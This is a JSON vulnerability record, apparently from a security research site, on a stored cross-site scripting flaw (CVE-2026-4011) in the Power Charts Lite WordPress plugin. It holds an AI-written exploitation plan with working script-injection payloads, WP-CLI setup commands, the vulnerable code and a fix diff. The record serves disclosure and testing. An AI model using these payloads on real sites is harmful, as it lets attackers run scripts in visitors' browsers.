[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fm7Hz4StmkRV_UV4lpIrPt-oetbjcDphaKVpxGXCFWYI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-4011","power-charts-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","Power Charts \u003C= 0.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The Power Charts Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [pc] shortcode in all versions up to, and including, 0.1.0. This is due to insufficient input sanitization and output escaping on the 'id' shortcode attribute. Specifically, in the pc_shortcode() function, the 'id' attribute is extracted from user-supplied shortcode attributes and directly concatenated into an HTML div element's class attribute without any escaping or sanitization at line 62. The resulting HTML is then passed through html_entity_decode() before being returned, further undermining any potential safety. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpgo-power-charts-lite",null,"\u003C=0.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:45:38","2026-04-15 08:28:17",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fea41d391-ba8d-43d9-8eda-69ac28c49328?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4011 (Power Charts Lite XSS)\n\n## 1. Vulnerability Summary\nThe **Power Charts – Responsive Beautiful Charts & Graphs** plugin (version \u003C= 0.1.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `pc_shortcode()` function, which handles the `[pc]` shortcode. The `id` attribute provided in the shortcode is concatenated directly into the `class` attribute of an HTML `div` element without sanitization or escaping. Furthermore, the final HTML output is passed through `html_entity_decode()`, which actively reverses any automatic entity encoding, allowing an attacker to break out of the HTML attribute and inject arbitrary scripts.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[pc]`\n*   **Vulnerable Attribute:** `id`\n*   **Authentication Level:** Contributor or higher (any role capable of creating or editing posts and using shortcodes).\n*   **Endpoint:** The standard WordPress post editor (Gutenberg or Classic) via `wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`.\n*   **Preconditions:** The plugin `wpgo-power-charts-lite` must be active.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode using `add_shortcode( 'pc', 'pc_shortcode' )` (inferred).\n2.  **Execution:** When a post containing `[pc id=\"...\"]` is rendered, WordPress calls `pc_shortcode( $atts )`.\n3.  **Processing (Sink):**\n    *   The `atts` are extracted.\n    *   At **line 62** (per description), the `$atts['id']` is concatenated: \n        `$output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">...';`\n    *   The function returns `html_entity_decode( $output )`.\n4.  **Rendering:** The returned string is embedded in the post content and sent to the browser.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a specific AJAX or REST API nonce for the *exploitation* (rendering) phase. Instead, the attacker needs a valid WordPress session and the standard nonces used to save a post:\n1.  **Post Creation\u002FEdit:** The `_wpnonce` and `_wp_http_referer` are required to save a post.\n2.  **Strategy:** The PoC agent should login as a Contributor and use the `browser_navigate` and `browser_eval` tools to capture the `_wpnonce` from the post editor page, or more simply, use **WP-CLI** to create the malicious post directly, bypassing the need for web-based nonce handling.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a crafted shortcode that executes JavaScript when viewed.\n\n### Step 1: Payload Crafting\nSince the `id` is placed inside `class=\"...\"`, we must break out of the attribute and the tag:\n*   **Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n*   **Shortcode:** `[pc id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n\n### Step 2: Injection (via WP-CLI)\nThis is the most reliable way to inject the stored payload as a Contributor.\n```bash\nwp post create --post_type=post --post_status=publish --post_author=contributor_user_id --post_title=\"Chart Test\" --post_content='[pc id=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]'\n```\n\n### Step 3: Triggering (via HTTP)\nThe agent will navigate to the newly created post's URL. The WordPress renderer will process the shortcode, and the result will be:\n```html\n\u003Cdiv class=\"pc-chart-container \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\n```\n\n### Step 4: Verification\nThe agent will use `http_request` to fetch the post content and check for the unescaped `\u003Cscript>` tag.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker_contributor attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Plugin Activation:**\n    ```bash\n    wp plugin activate wpgo-power-charts-lite\n    ```\n\n## 7. Expected Results\n*   The HTTP response for the post frontend should contain the literal string: `class=\"pc-chart-container \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`.\n*   The `html_entity_decode` function call in the plugin source will ensure that even if the database layer or shortcode parser attempted to encode `\u003C` or `>`, they are restored to their functional HTML forms.\n\n## 8. Verification Steps\n1.  **Retrieve Post ID:** Use `wp post list --name=\"Chart Test\" --format=ids`.\n2.  **Inspect HTML via CLI:**\n    ```bash\n    # This simulates the rendering logic by calling the shortcode handler directly\n    wp eval 'echo do_shortcode(\"[pc id=\\\"\\\">\u003Cscript>alert(1)\u003C\u002Fscript>\\\"]\");'\n    ```\n3.  **Check for XSS Sink:** Verify the output contains `\u003Cscript>`.\n\n## 9. Alternative Approaches\n*   **Attribute Breakout (Event Handlers):** If `\u003Cscript>` tags are filtered by a WAF, use an event handler:\n    *   `[pc id=' \" onmouseover=\"alert(1) ']`\n*   **Iframe Injection:**\n    *   `[pc id='\">\u003Ciframe src=\"javascript:alert(1)\">']`\n*   **Post Meta Injection:** If the `id` is alternatively sourced from post meta or options in certain versions, check `update_post_meta` calls in the plugin's save handlers. (Based on description, the shortcode attribute is the primary vector).","The Power Charts Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the [pc] shortcode. Due to a lack of sanitization and the use of html_entity_decode() on the final output, a Contributor-level attacker can break out of an HTML class attribute to inject and execute arbitrary JavaScript.","\u002F\u002F In the pc_shortcode function\n\u002F\u002F Line 62 (approx)\n$atts = shortcode_atts( array(\n    'id' => '',\n), $atts );\n\n$output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">';\n\u002F\u002F ... further chart processing ...\n$output .= '\u003C\u002Fdiv>';\n\nreturn html_entity_decode( $output );","--- a\u002Fwpgo-power-charts-lite.php\n+++ b\u002Fwpgo-power-charts-lite.php\n@@ -59,7 +59,7 @@\n-    $output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">';\n+    $output = '\u003Cdiv class=\"pc-chart-container ' . esc_attr( $atts['id'] ) . '\">';\n \n-    return html_entity_decode( $output );\n+    return $output;","The exploit is performed by an authenticated user with at least Contributor permissions. The attacker creates a new post or page and embeds the [pc] shortcode with a malicious payload in the 'id' attribute. The payload uses a double-quote and a closing angle bracket to break out of the HTML class attribute (e.g., [pc id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']). When the post is viewed by any user, the WordPress shortcode parser executes the vulnerable pc_shortcode() function, which concatenates the payload directly into the HTML output. The plugin's use of html_entity_decode() on the return value ensures that the injected characters are rendered as functional HTML tags rather than entities, triggering the script execution.","gemini-3-flash-preview","2026-04-16 15:42:10","2026-04-16 15:42:29",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpgo-power-charts-lite\u002Ftags"]